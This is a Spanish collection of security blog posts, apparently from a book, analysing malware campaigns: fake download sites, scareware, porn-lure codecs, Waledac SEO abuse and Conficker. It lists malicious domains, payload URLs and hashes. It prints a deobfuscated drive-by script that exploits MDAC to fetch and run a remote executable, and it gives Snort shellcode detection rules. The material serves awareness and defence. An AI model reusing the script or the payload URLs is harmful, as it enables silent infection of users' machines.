Un ejemplo concreto lo constituyen las estrategias de engaño que aprovechan Ingeniería Social visual para explotar recursos masivamente buscados en la nube de información y del cual he mostrado varios ejemplos.

En este sentido, otras de las alternativas maliciosamente gestadas en la mente de algún desarrollador malicioso son los sitios intencionalmente creados para la propagación de código malicioso.

Por ejemplo, un falso sitio del proyecto Emule (el famoso programa cliente para descarga de archivos a través de redes P2P), desde donde se descarga un binario llamado:

• Official-eMule_setup.exe (MD5: 71f0aa3305d5e87c0cbcfba0c2bb3425)

Actualmente con muy baja tasa de detección; sólo 3 de 40 antivirus.

También un falso sitio del reproductor de videos Live Player, desde el cual se descarga el ejecutable llamado

• Live-Player_setup.exe (MD5: 1f9e21ffbf6030f1f1bd77e0ba57368c) 188

Detectado por 9 de 40 motores antivirus.

Esto se está explotando activamente a través de una campaña que engloba sitios web promocionando programas masivamente utilizados. Los dominios involucrados son:

backstripgirls .com buscalisto .com download.hot-tv .com download.live-player .com download.official-emule .com download.original-solitaire .com download.speed-downloading .com download.web-mediaplayer .com favorit-network .com games-attack .com go-astro .com go-turf .com gomusic .com gomusic .net hot-tv .com littlesmileys .com live-player .com official-bittorrent .com original-solitaire .com pc-on-internet .com schnellsucher .com search-solver .com speed-downloading .com static.favorit-creatives .com vl02.c76.fvtn .net web-mediaplayer .com www.buscalisto .com www.favorit-network .com www.games-attack .com www.gomusic .com www.hot-tv .com www.live-player .com www.official-bittorrent .com www.official-emule .com www.pc-on-internet .com www.schnellsucher .com www.search-solver .com www.smilymail .com www.speed-downloading .com www.trovarapido .com www.web-mediaplayer .com 189

Incluso, a través de una búsqueda se obtiene que estos sitios poseen un buen posicionamiento web, quizás a través de técnicas Black Hat SEO.

Esto demuestra el "entusiasmo" que los creadores y diseminadores de malware depositan en estas acciones delictiva buscando claramente engañar a los usuarios al intentar captar la atención con métodos propagandistas de promoción de malware a través de falsos sitios. Scareware. Estrategia de engaño propuesta por Personal Antivirus Sin lugar a dudas, las estrategias de engaño son una pieza fundamental para formar la maquinaria que mueve la industria del malware que constantemente busca explotar las debilidades de lo que se encuentra entre la silla y el teclado de la PC: el factor humano, o capa 8 como diría un querido amigo :D

Lo cierto es que cualquier tipo de motivo es válido para los propagadores de malware, incluso, en el afán de aplicar Ingeniería Social a la mente de los usuarios, los mecanismos de seguridad que suelen implementar compañías que ofrecen servicios a través de Internet, son utilizados para el engaño.

Una de estas protecciones es la que nos ofrece Google alertando al usuario cuando está a punto de acceder a un sitio que aloja contenido dañino, bloqueando el sitio advirtiendo del potencial peligro a través de un mensaje que dice:

"Este sitio web ha sido reportado como un sitio atacante y ha sido bloqueado basándose en sus preferencias de seguridad. Los sitios atacantes intentan instalar programas que pueden robar información privada, usar su computadora para atacar otras o dañarlo. Algunos sitios atacantes distribuyen intencionalmente programas dañinos, pero muchos son instalados sin el conocimiento o permiso de sus propietarios".

Sin embargo, más allá de la protección, que es muy importante, las campañas de propagación se encargan de idear estrategias cada vez más profesionales y, por ende, cada vez más peligrosas. 190

Una de estas campañas está siendo activamente explotada por el scareware llamado Personal Antivirus que, simulando la protección que ofrece Google, emite un alerta muy similar a simple vista, cuyo mensaje dice lo siguiente:

"¡Advertencia! La visita de este sitio puede dañar tu equipo! Este sitio web probablemente contiene programas maliciosos que pueden causar daños al equipo o rendimiento sin su permiso. Su computadora puede resultar infectada visitando dicho sitio Web. Le recomendamos que instale (o active) el programa de seguridad antivirus..."

Ofreciendo dos opciones: "continuar desprotegido" o "adquirir un programa de seguridad". A pesar de tener la supuesta posibilidad de decidir, cuando se hace clic sobre alguno de los botones, el usuario es remitido directamente al sitio web del scareware, en el cual se insita a la compra del falso programa de seguridad antivirus. Que de hecho, cuesta la módica suma de USD 59.95 .

Los códigos maliciosos tipo scareware son cada vez más agresivos y sus estrategias cada vez más profesionales, esto demuestra una clara influencia que pone en manifiesto que detrás del desarrollo de malware y métodos de propagación/infección, se encuentran células delictiva que asiduamente intentan obtener dinero a través de diferentes estafas.

Campaña de Ingeniería Social visual orientada a plataformas Mac OS X Hace varios años atrás, muchos profesionales de seguridad recomendaban el empleo de firefox como navegador y no IE debido a su alto índice de vulnerabilidades; esto, en los tiempos actuales ha cambiado radicalmente y se habla de firefox como uno de los navegadores web más atacados y con más vulnerabilidades.

En este sentido, en muchas charlas me preguntan por qué Windows es tan atacado; y la respuesta es mucho más sencilla de lo que se supone.

191

Teniendo en cuenta que el malware actual representa una de las mayores preocupaciones para un ambiente de información y que su objetivo se traduce constantemente en robar dinero a través de diferentes formas delictivas, no es difícil pensar por qué las plataformas Microsoft son las más atacadas: simplemente responde a un tema de masividad en cuanto a su uso.

Sin embargo, el mismo efecto se está produciendo en plataformas GNU/Linux y Mac OS X porque cada vez son más los usuarios adeptos y sin importar su nivel de conocimiento informático, lo que refleja un claro aumento de códigos maliciosos diseñados para estas plataformas.

Es así que una campaña de Ingeniería Social visual se ha liberado recientemente orientada a la propagación de malware donde los usuarios de sistemas operativos Mac OS X son los blancos.

La estrategia responde a lo habitual de la misma, mostrando una ventana emergente advirtiendo de la necesidad de descargar un componente (que es falso) para visualizar el video.

Algunas de las direcciones involucradas en la campaña son: bestpornhub2009.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg deposituploads.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg filmunlock.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg flash-license.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg player-codec.biz/download/666c507271673d3d83b13d19/License.v.3.413.dmg playerxtra.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg plumpals.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg quotre.net/download/666c507271673d3d83b13d19/License.v.3.413.dmg rexato.net/download/666c507271673d3d83b13d19/License.v.3.413.dmg 192 swinget.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg kindtoy.com/download/6b72504756673d3d397ccafd/MacTubePlayer.dmg movlock.com/download/666c507271673d3d83b13d19/License.v.3.413.dmg part-owner.net/download/6b72504756673d3d397ccafd/macvideo.dmg shotdro.com/download/3776694945673d3d03635c6c/play-video.dmg tourdo.net/download/654a635066413d3df111c253/HDTVPlayerv3.5.dmg mac-videos.com/play/mac-video.php mac-videos.com/start.html 91.212.65.20/cgi-bin/generator.pl

Como vemos, la clásica estrategia de Ingeniería Social visual está orientada a otras plataformas, y los ciberdelincuentes están ampliando su cobertura de ataque hacia otros sistemas operativos, pero siempre... con los mismos objetivos: propagar malware.

Estrategia BlackHat SEO propuesta por Waledac Waledac es el nombre del troyano encargado de reclutar zombis PC's para formar parte de su botnet , cuya función principal es la propagación de uno de los más comunes spam que a diario recibimos: Canadian Pharmacy.

Muchos profesionales de seguridad afirman que es la evolución de otra famosa botnet llamada Storm, o Nuwar dependiendo de la compañía antivirus.

193

Al igual que Storm, una de las características más interesantes de Waledac, además de la utilización de técnicas avanzadas como Fast-Flux, son las estrategias de Ingeniería Social, que en su caso, comenzaron con una campaña propagandista en relación al día de los enamorados, y que renueva cada cierto tiempo, siendo su última maniobra un supuesto programa para enviar mensajes SMS.

Sin embargo, Waledac también hace uso de técnicas de posicionamiento web poco éticas empleadas de manera estratégica para atraer llegadas hacia los diferentes dominios, que hoy redirigen hacia la fraudulenta farmacia en línea, que emplea para propagar el troyano; llamada BlackHat SEO.

Algunos de los dominios empleados por esta amenaza son: yourvalentineday .com virtualesms .com usabreakingnews .com urbanfear .com terrorismfree .com terrorfear .com terroralertstatus .com smspianeta .com smsdiretto .com smsclubnet .com photoblogsite .com orldlovelife .com nuovosms .com mobilephotoblog .com miosmsclub .com globalantiterror .com freeservesms .com freecolorsms .com fearalert .com easyworldnews .com

Cada uno de los dominios fueron creados pensando como todo un estratega, utilizando palabras comunes para formar la composición de la URL. Entre ellas: valentine - your - day - virtual - sms - break - king - news - urban - terror - fear - mobile - china - blog - life - best - anti - poems - ship - love - central - online - great - coupon - club - ltd - free - adore - poem - lyric - world - sales - super - portal - code - site - eye - blue - dot - funny - smart - group - fun - songs - wireless - city - wap - link - good - review - who - cher - help - radio - report - the - lovers - long - fm - michigan - chat - loving - romantics - track - cherish - space - my - digital - country - discount - tax - tnt - 194 letter - against - mazda - car - speed - zone - dealer - cars - buy - tribute - auto - motive - parts - death - taxi - work - care - direct - pet - cab - bead - net - ming - water - data - lose - can - pool - all - pond - wager - team - doc - now - fast - bank - expo - wale - job - barack - obama - guide - greeting - december - christmas - lights - year - regards - white - mira - bella - project - company - top - father - its - media - just - gift - garb - live - cheap - service - home - black

Esto responde a la campaña de BlackHat SEO que Waledac utiliza para atraer potenciales víctimas, y que cada vez más códigos maliciosos emplean para lograr un posicionamiento web que les garantice de manera temprana, el acceso a los sitios maliciosamente creados para diseminar malware.

Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección Las estrategias de engaño son muy diversas y sólo se limitan a la imaginación de quien las explota. Teniendo en cuenta también que los sitios con contenidos pornográficos constituyen uno de los recursos con mayor demanda en Internet, es lógico pensar que sean aprovechadas con fines maliciosos como es habitual a través de Ingeniería Social del tipo visual .

Este es un recurso que probablemente, ningún propagador de malware piense dejar de lado por mucho tiempo, y sin importar el tipo de presentación que utilicen para visualizar un supuesto video pornográfico que nunca se verá, el objetivo es siempre el mismo y se traduce en dinero.

La siguiente secuencia de imágenes es un ejemplo concreto que representa está técnica de Ingeniería Social que no pasará de moda. Hipotéticamente hablando, supongamos que hemos llegado hasta el siguiente sitio a través de alguna de las tantas vías que propone Internet. Este es el punto donde generalmente se tiende a "elegir" el tipo de video...

... donde luego de seleccionarlo se presenta la típica ventana de video streaming.

195

Luego de unos segundos, se nos advierte de la necesidad de instalar un componente que nos permita visualizar el contenido web, e inmediatamente después se ofrece la descarga del supuesto componente que en realidad es un malware con un bajo índice de detección.

• set.exe 6/40 (15.00%) - (MD5: a39b53afa8ac6bfb52b4ec16c0630916)

Sin embargo, la página fue creada exclusivamente para llevar a cabo la propagación del malware ofreciendo, además del contenido porno, un supuesto reproductor de video llamado BB-PlayeR. Un troyano con una tasa de detección mucho más aceptable que la del binario anterior.

• BB-Player.exe 28/40 (70%) - (MD5: 8d2e1cf60f7fdf9edca3dfba5bf73cc0)

Este ejemplo, tomado de un caso real y activo actualmente, constituye el modus operandi de propagación de malware explotando Ingeniería Social visual explotando como temática de "enganche" la pornografía.

196

Ingeniería Social visual y el empleo de pornografía como vector de propagación e infección II Como dijo alguna vez Kevin Mitnik "La gente no está preparada para el engaño a través de la tecnología". Quizás, esta afirmación de la cual calculo coincidimos muchos de quienes nos dedicamos al ámbito de la seguridad, sea parte de la respuesta al ¿por qué de la efectividad de esta nada compleja técnica?

Básicamente, se trata nuevamente de Ingeniería Social del tipo visual aprovechando imágenes pornográficas para propagar malware.

El modo de operación, como siempre, se presenta la imagen del supuesto video, pero al hacer clic para visualizarlo aparece una ventana de alerta indicando la falta de un códec, ejecutándose así el intento de propagación del malware.

• codec.exe 32/40 (80%) - (MD5: 2b128610c3c32bc6d1da4bbf97901768)

En este caso, la estrategia forma parte de la campaña de diseminación de un conocido scareware llamado WinPC Antivirus cuya tasa de detección es del 80%.

Esto indica lo "universal" de la técnica ya que sin responder a un tipo determinado de malware, constituye un método y vector sumamente explotado para engañar a los internautas y propagar la amenaza a través de una temática ampliamente demandad en Internet, como lo es la pornografía. 197

Campaña de propagación del scareware MalwareRemovalBot Registrar varios dominios en una misma dirección IP, es una de las metodologías más explotadas para la propagación de programas scareware ya que le permite un coherente posicionamiento web, poco ético dicho sea de paso, ampliando el horizonte de posibilidades de que algún desesperado usuario llegue hasta la web que promete, a través de su falso producto, solucionar de manera mágica sus problemas y/o implementar una supuesta capa de seguridad a su equipo ante potenciales infecciones.

Evidentemente, el scareware (o rogue ) como cualquiera de los códigos maliciosos actuales se suma a la organización delictiva que representan como parte activa y que constantemente buscan obtener beneficios económicos, en muchos casos formando parte de paquetes crimeware como es el caso de Unique Sploits Pack, que incorpora un módulo para la propagación de scareware.

En este caso, se trata del scareware MalwareRemovalBot , que si bien no es nada nuevo, actualmente se encuentra manifestándose a través de diferentes nombres de dominios alojados bajo la misma dirección IP (174.132.250.194). Seguramente empleando servidores virtuales .

Algunos de los dominios involucrados en esta campaña son: antivirus360remover .com av360removaltool .com malwarebot .org malwaree .com malwaree .org remove-a360 .com 198

remove-antivirus-360 .com remove-av360 .com remove-ie-security .com remove-malware-defender .com remove-personal-defender .com remove-spyware-guard .com remove-spyware-protect-2009 .com remove-spyware-protect .com remove-system-guard .com remove-total-security .com remove-ultra-antivir-2009 .com remove-ultra-antivirus-2009 .com remove-virus-alarm .com remove-virus-melt .com remove-winpc-defender .com smitfraudfixtool .com vundofixtool .com www.antivirus360remover .com www.av360removaltool .com www.malwarebot .org www.malwaree .com www.malwaree .org www.remove-a360 .com www.remove-antivirus-360 .com www.remove-av360 .com www.remove-ie-security .com www.remove-ms-antispyware .com www.remove-personal-defender .com www.remove-spyware-guard .com www.remove-spyware-protect-2009 .com www.remove-spyware-protect .com www.remove-system-guard .com www.remove-total-security .com www.remove-ultra-antivir-2009 .com www.remove-ultra-antivirus-2009 .com www.remove-virus-alarm .com www.remove-virus-melt .com www.remove-winpc-defender .com www.vundofixtool .com

El archivo ejecutable de la amenaza (MD5: 08a0b7b100567eb5a1373eb4607d5b24) tiene como nombre setupxv.exe, y posee un bajo índice de detección. Sólo 11 de 39 compañías antivirus lo detectan.

Este binario es sólo una cápsula que contiene las otras piezas del malware como los ejecutables que le permiten su ejecución en plataformas Microsoft de 32-bits y 64-bits, dependiendo el caso. Algunos de los archivos son:

• MalwareRemovalBot64.msi - 0/40 (0%) (MD5: 708149179e0f18304413edd56d16fa48) • MalwareRemovalBot.msi - 0/40 (0.00%) (MD5: e1a1c6175d65ab6be8d5f5cbc85a4ca6) • MSIStart.exe - 7/40 (17.50%) (MD5: 3de82388a6e799446bada69b6a08dc9e) • zlib.dll - 2/40 (5%) (MD5: 81ac3f43a5b07d202b5723145d3d88f9) • TCL.dll - 5/40 (12.5%) (MD5: 2a4a0083d63d44374a64a27974eea789) • SpyCleaner.dll - 13/40 (32.5%) (MD5: 1ca00d4ef4319c9cd454397e5659600b) • MalwareRemovalBot.srv.exe - 3/40 (7.50%) (MD5: 852f708466a5b74556b69c536d3add7e) • MalwareRemovalBot.exe - (MD5: 25166bb5d2629cb6dfb9ac6143b88f00)

En muchos otros casos, el scareware hace uso de otras técnicas de propagación y engaño que no pasan de moda y se encuentran presentes como estrategia innata de cualquier malware actual, o hacen uso (cada vez más) de técnicas SEO Black Hat, y un par de etcéteras más. 199

Continúa la importante y masiva campaña scareware Durante el pasado mes, había escrito algo sobre una importante campaña de propagación de malware del tipo scareware , o rogue, empleando como estrategia de engaño páginas que simulan ser el explorador de Windows, tanto en idioma inglés como en español.

Un mes después, la campaña se sigue masificando explotando una importante cantidad de dominios, en su mayoría, de origen chino.

Sin embargo, sus creadores y diseminadores canalizan todos sus esfuerzos no sólo en obtener dominios de manera rápida a través del registro en hosting gratuitos o vulnerados, sino que también en evitar la detección por parte de compañías antivirus sin importar el ciclo de vida del instalador, ya que prácticamente es modificado a diario.

Algunos de los binarios y dominios involucrados son:

• install.exe. MD5 857fe3b30bc1f8a7ec4b73cb8dd38d3d • install.exe. MD5 59d60912ff9d1a91fc9d75fcbede6c8d • install.exe. MD5 16c601cf62a51250d2be81555172525a • installer_1.exe. MD5 17354a6e1f2f8fb3ca507615060364bc • setup.exe. MD5 20cfc5b10dae04aae02a16d6bf14d081 ia-scannerpro .com scanplus4 .info newscan4 .info anytoplikedsite .com topsecurity4you .com cleanyourpcspace .com fullsecurityshield .com xw.dayindigo.cn/in .cgi?9 onlinedetect.com/in .cgi?6 greatsecurityshield .com easycheckpoisonpro .cn/? examineillnesslive .cn easydefenseonline .cn bigdefense2u .cn vlo.bookadorable.cn/in .cgi?9 davidkramm.net/core/admin/bald-pussy-photo/red-pepper-humus-recipe .html 1000league .com/in .cgi?9 goscanstep .com/?uid=12724 in4ck .com/cki.php?uid=12724 data6scan .com/?uid=12724 bwgm.schoolh .cn/in.cgi?6 designroots .cn/in.cgi?6 drawingstyle .cn/in.cgi?6 200

ed.worksean .cn/in.cgi?6 housevisual .cn/in.cgi?6 kvk.housevisual .cn/in.cgi?6 oceandealer .cn/in.cgi?6 pub.oceandealer .cn/in.cgi?6 peopleopera .cn/in.cgi?6 rainfinish .cn/in.cgi?6 schoolh .cn/in.cgi?6 vitamingood .cn/in.cgi?6 websiteflower .cn/in.cgi?6 worksean .cn/in.cgi?6 xfln.housevisual .cn/in.cgi?6 yz.worksean .cn/in.cgi?6 securedantivirusonlinescanner .com thankyou4check .com antivirusonlineproscan .com antivirus-pro-live-scan .com antivirusonlineproscanner .com allsoftwarepayments .com powerdownloadserver .com securitysoftwarecheck .com wwwsafetyread .com scan7live .com traffbox .com/in.cgi?6 soft-traffic .com rd-point .net/go.php?id=1188 ddors .info/in.cgi?10 truconv .com/?a=125&s=gen-asw yourfriskviruspro .cn/?wm=70127&l=1 addedantivirusstore .com myplusantiviruspro .com realantivirusplus .com yourguardstore .cn addedantiviruslive .com japanhostnet .com/in.cgi?mainy8com

Si bien esta lista es bastante generosa, en comparación con la cantidad de dominios utilizados para la campaña scareware representa tan solo un mínimo porcentaje.

Por otro lado, más allá de la campaña en sí mismo, otro factor que preocupa es la cada vez mayor eficacia de este tipo de códigos maliciosos .

201

Falsas páginas utilizadas como vector de propagación de malware Las estrategias de engaño a través de Ingeniería Social se encuentran a la orden del día en Internet y representan el comienzo de potenciales riesgos de seguridad; siendo, la clonación o la presentación de falsas páginas web, uno de los vectores más explotados para romper la seguridad del factor humano.

Algunas son más complejas que otras, y algunas más llamativas o mejor elaboradas que otras; sin embargo, por más trivial que sea el engaño, su efectividad irá en relación directa con el nivel de educación que, en materia de seguridad, tenga quien accede a la trampa del delincuente informático.

En definitiva, la siguiente captura es un ejemplo con el que recientemente me he encontrado. Se trata de una falsa página que descarga un archivo binario llamado surprise.exe (MD5: 9bd6a9cba442a88839a185eb47c2008c) que es una variante del código maliciosos Virtumonde , también llamado Monde o Vundo .

Para que se visualice un componente de cotejo, la próxima es una captura de la página real de sendspace.

202

Una estrategia muy empleada a través de estas técnicas, es el uso de nombres de dominios similares al real; es decir, la página falsa es http://sendspace-us .com mientras que la real es http://sendspace.com. Esto constituye, en este caso, el principio de una potencial infección.

Otro dato más que interesante es que, el dominio que representa la falsa página se encuentra en la dirección IP 196.2.198.241, cuyo sistema autónomo es AS33777 de EgyptNetwork.

A su vez, esta dirección IP representa varios dominios más. cd-soft.net darthvader777.com egns.vg good1soft.com greatlovingcore.net kassperskylabs.cn kentty.net searchingforthevhostipadres.com sendspace-us.com sendspace.com.bz throbilskirnir.com thronofodin.com ustechservic.com.cn www.cd-soft.net www.charming-woman.com www.darthvader777.com www.dx-software.com www.egns.vg www.good1soft.com www.greatlovingcore.net www.icm-com-services.com www.sendspace.com.bz www.throbilskirnir.com www.thronofodin.com www.ustechservic.com.cn

Como podemos apreciar, incluso uno de los dominios de la lista es kassperskylabs .cn, muy similar al de la conocida empresa de seguridad antivirus. 203

Drive-by-Download y Drive-by-Update como parte del proceso de infección Sin lugar a dudas, los delincuentes informáticos han encontrado en Internet una excelente plataforma de ataque de la cual aprovechan, no sólo las capacidades de diseminación de malware de manera casi instantánea a través de diferentes tecnologías, sino que también hacen abuso de las debilidades que presenta el factor humano; la mayoría de los casos, por falta de un adecuado nivel (mínimo) de educación en materia de seguridad en general y sobre códigos maliciosos en particular.

Diferentes técnicas de ataque posibilitan, si se cumplen determinadas condiciones en el equipo víctima, que las instrucciones cada vez más invasivas del malware, infecten los sistemas con la sola acción de establecer una conexión con Internet.

El siguiente ejemplo, representa uno de los ataques más comunes a través de Internet, Drive- by-Download .

En el preciso momento en que el usuario accede a la dirección web, en segundo plano se ejecutan instrucciones maliciosas a través de un script ofuscado que, desofuscado, muestra lo siguiente: var ailian, zhan, cmdss; ailian = "http://pxciiruurw .cn/new/load .exe"; zhan = "run.exe"; try { var ado = (document.createElement("object")); var d = 1; ado.setAttribute("classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var e = 1; var xml = ado.CreateObject("Microsoft.XMLHTTP", ""); var f = 1; var ln = "Ado"; var lzn = "db.St"; var an = "ream"; var g = 1; var as = ado.createobject(ln + lzn + an, ""); var h = 1; xml.Open("GET", ailian, 0); xml.Send(); as.type = 1; var n = 1; as.open(); as.write(xml.responseBody); as.savetofile(zhan, 2); as.close(); 204 var shell = ado.createobject("Shell.Application", ""); shell.ShellExecute(zhan, "", "", "open", 0); } catch (e){ } ;

Esto significa que el script contiene un exploit, en este caso, que explota una vulnerabilidad en MDAC (Microsoft Data Access Components), y descarga un binario llamado load.exe (MD5: f2e4869924c6468fbc05a146a1a3bd11).

Se trata de un troyano tipo download que intenta establecer conexión con http://ddvrrflabpqcuoaexpwp.cn/2_s_t .php para descargar más malware.

En muchos otros casos, el Drive-by-Download es combinado con otras como el Drive-by- Update para continuar el proceso de propagación post infección, permitiendo el acceso al sistema de otros códigos maliciosos.

El Drive-by-Update es un proceso malicioso post infección utilizado para controlar las descargas de códigos maliciosos.

En el caso de la vulnerabilidad en MDAC explotada por este malware, la misma data del año 2006. Aún así, a pesar de tener solución a través de un parche de seguridad, es altamente explotada como vector ataque a través de Internet.

Por lo tanto, esto supone un mayor grado de cuidado sobre las páginas que visitamos, y un mejor empleo de las buenas prácticas de seguridad que ayudarán notablemente a la prevención ante potenciales infecciones.

205

Waledac. Seguimiento detallado de una amenaza latente Las noticias controversiales de los últimos días en torno al gusano Conficker, han "tapado" bastante las acciones dañinas de otras amenazas que, por su menor cobertura mediática, no han tenido una significativa publicidad ni demanda por parte de los medios de información, o desinformación en algunos casos. Sin embargo, aún así, siguen aumentando su cobertura de infección. Uno de estos casos es Waledac .

Este troyano, cuya campaña de infección comenzó a gestarse a través de un amplio repertorio de amorosas imágenes y, últimamente falsas noticias sobre explosiones, utilizadas como estrategias de Ingeniería Social, sigue teniendo un alto índice de infección a nivel global. En este sentido, muchos esperamos que en cualquier momento, al estilo Nuwar , modifique nuevamente la estrategia de engaño visual.

Ver anexo V

Sudosecure viene realizando un excelente trabajo rastreando los pasos de Waledac desde su aparición ofreciendo informes actualizados con datos detallados sobre el estado actual del troyano. De este seguimiento podemos desprender información como por ejemplo, el top 10 de los binarios más descargados y las 10 direcciones IP más utilizadas para descargarlos.

206

Los 10 países que más propagan Waledac y los 10 dominios más utilizados.

Incluso, el número de direcciones IP propagando el troyano en los últimos 30 días.

Claramente se percibe el grado de propagación a nivel global. Y cada vez que veo cosas por el estilo, me pregunto cuál es el nivel de propagación, en este caso, de Waledac a nivel local (Argentina). Esta información también puede ser desprendida de las estadísticas que se encuentran en sudosecure.

Para clarificar un poco la incógnita, he realizado un sencillo gráfico que muestra la relación de dominios, direcciones IP y ubicación desde la cuál se produce la diseminación de Waledac.

Ver anexo V

Es decir, cada una de las direcciones IP representa un equipo infectado. El gráfico está realizado en base a los primeros 50 dominios que propagan Waledac desde Argentina.

207

En algunos casos notarán que una misma dirección IP es utilizada por varios dominios y viceversa, esto es porque Waledac utiliza mecanismos complejos de propagación como lo son las redes Fast-Flux .

Quizás muchos de nosotros nos olvidemos que Waledac transforma los equipos de usuarios desprevenidos en zombis para alimentar, aún más, la importante botnet desde la cual, entre otras cosas, distribuye spam de manera distribuida.

Conficker. Cuando lo mediático se hace eco de todos descuidando el problema de fondo Conficker no es un código malicioso (gusano) diferente a muchos otros que han existido, y que continuarán apareciendo, y que existen en la actualidad; sin embargo, en poco tiempo se llevó la atención de todos los medios de información a nivel mundial, incluso, muchos de ellos, rozando de manera muy fina la línea que divide la seriedad de atender un tema tan preocupante como lo son las infecciones, y el amarillismo del caso, jugando con eso de "si esta en boca de todos vende, sigamos hablando de conficker".

Ya con casi seis meses de existencia, es cierto!! :-), está en boca de todos con eso de la "sorpresa" que tiene preparado para el día de hoy, 1 de Abril.

Si bien es verdad que en poco tiempo conficker logro un alto porcentaje de infección a nivel global, y más preocupante aún a nivel local, también es cierto que simplemente queda reflejada la falta de madurez en torno a la gestión de seguridad.

Muchas e importantes compañías sufrieron las consecuencias, a través de conficker, de no atender la seguridad en su justa medida, mientras que muchas otras, como lo dije en otro blog, ni siquiera sintieron el roce de las instrucciones maliciosas del código de conficker. ¿Por qué?

Quizás una orientación acertada para obtener la respuesta coherente para esta pregunta tan trivial pase de cerca por el SGSI (Sistema de Gestión de Seguridad de la Información). Es decir, si queremos "calidad" en la seguridad, "necesitamos" apoyarnos en un proceso sistemático como el que nos ofrece la ISO 27001.

Pero sin desviarnos demasiado, ni entrar en lo más profundo de la gestión de seguridad, sólo diré que muchos de los problemas que ocasiona conficker, pueden (y pudieron) evitarse simplemente con mantener una adecuada gestión de las actualizaciones de seguridad en plataformas Windows.

La realidad es que conficker, como todo código malicioso, constituye un potencial peligro para cualquier entorno de información, en consecuencia, muchos se encuentran sufriendo enormes dolores de cabeza por "la causa" del gusano. Entonces, ¿cómo atacamos el problema?

No es mi intención hacer una cobertura sobre las acciones, vectores de propagación, etc. de conficker ya que en la red hay mucha información al respecto, como el excelente paper llamado Containing Conficker que forma parte de la serie Know Your Enemy elaborado por la gente de The Honeynet Project, o el escrito por Cert.at llamado Detecting Conficker in your Network.

Pero sí me gustaría facilitar algunas herramientas con las que podemos hacer frente al gusano, ya que en la mayoría de los casos, no todas las compañías AV ofrecen una eliminación completa de la amenaza, sin embargo, la mayoría posee una herramienta de limpieza gratuita que podemos utilizar.

• ESET • Kaspersky 208

• F-Secure • McAfee • Microsoft • Sophos • Symantec • TrendMicro • BitDefender • AhnLab

Del mismo modo, la gente de The Honeynet Project ha publicado unas PoC que consisten en herramientas producto de la investigación que han llevado a cabo en torno a este tema.

• Downatool2. Los nombres de dominio de las diferentes variantes de conficker pueden ser usados para detectar máquinas infectadas dentro de una red. • Dominios de colisión de conficker C. A diferencia de la primera y segunda generación de variantes de conficker (conficker.A y B) que crean 250 dominios por día para descargar sus actualizaciones, se espera que la tercera generación, cuente con más de 50.000 dominios. Esta es una lista de los dominios que se esperan descarguen conficker durante abril. • Desinfección de memoria. Identificar conficker se torna complicado debido al nivel de empaquetamiento y cifrado que incorpora, salvo cuando se encuentra en memoria. • Detección de archivos y modificaciones del registro. Aparentemente, los nombres de archivos y los nombres de las claves que crean en el registro las variantes B y C de conficker, no son al azar, sino que se encuentran basadas en el nombre de cada host infectado. Por el contrario, la variante A sí toma nombres al azar. • Simple Conficker Scanner (SCS). Escaner de red para detectar conficker. Requiere la instalación de la librería "Impacket" de python. • IDS. Dependiendo de los patrones utilizados por las diferentes generaciones de conficker, es posible detectar su presencia a través de reglas.

Conficker A

alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|&

Conficker B

alert tcp any any -> $HOME_NET 445 (msg: "conficker.b shellcode"; content: "|e8 ff ff ff ff c2|_|8d|O|10 80|1|c4|Af|81|9MSu|f5|8|ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|Ise|c4 c4 c4|,|ed c4 c4 c4 94|&

• Nonficker Vaxination Tool. Conficker utiliza mutex para asegurarse que en el equipo infectado se encuentra su más reciente versión. Este método puede ser empleado para prevenir potenciales infecciones simulando un servicio levantado a través de una dll.

Incluso, contamos con una nueva versión de nmap (4.85Beta5) que incorpora las rutinas de detección de conficker, disponible para diferentes plataformas: Windows, OSX, Linux. 209

Por otro lado, es recomendable, ya que no está de más, realizar breves auditorias con el ánimo de verificar el nivel de seguridad vulnerabilidad de nuestros entornos. Podemos recurrir, por ejemplo, a herramientas como MBSA de Microsoft o CSI/PSI de secunia.

Por último, no hay que olvidarse de instalar las actualizaciones críticas de seguridad que solucionan las vulnerabilidades explotadas por conficker: MS08-067, MS08-068 y MS09-001.

Conficker II. Infección distribuida del gusano mediático Pasado el "tan esperado día" en que supuestamente conficker arrasaría con todo, son muchas las reflexiones que quedan pululando por la gran red. Muchas compañías de seguridad y profesionales de la materia que pronosticaban una gran ola maliciosa arrastrada por el gusano mediático, se quedaron sin respuestas al ver que terminaba el día y nada pasaba :-)

Es decir, conficker no "salió" al campo con nada nuevo, siguió su carrera de infección como lo viene haciendo desde un principio aumentando el índice de infección que se tenía hasta el momento; con lo cual no quedó otra que decir "eso no significa que en un futuro no muy lejano conficker salga al campo con un batallón más grande". Esto es lógico, cualquier malware puede manifestarse en cualquier momento vaya uno a saber con qué.

Si bien no se pone en tela de juicio que conficker es un peligroso código malicioso, lo sucedido hasta el momento demuestra la inteligencia de su creador (o sus creadores) en la planificación no sólo de la estrategia de diseminación sino que también en la estrategia de Propaganda , Ingeniería Social y Acción Psicológica que ejerció a través de los medios de comunicación de todo el mundo, tan solo con implantar un rumor .

Tampoco se cuestiona que ha logrado un altísimo índice de infección descubriendo, como lo he comentado en el anterior post, lo inmaduro que todavía se encuentran algunas cuestiones de seguridad, tanto a nivel hogareño como, más preocupante aún, a nivel corporativo.

En relación al nivel de infección de conficker, estaba leyendo un breve y muy interesante informe en Conficker Working Group llamado Infection Distribution, en el cual se muestra a través de mapas, los índices de infección del gusano a nivel global.

Infecciones a nivel mundial Infecciones en Estados Unidos

210

Infecciones en Europa

http://3.bp.blogspot.com/_Ppq0fEGkHo4/SdTk0DtsAmI/AAAAAAAABJk/390V8ySqzuQ/s1600- h/conficker_europe_map.png

Infecciones en Australia Infecciones en Indonesia y Malasia

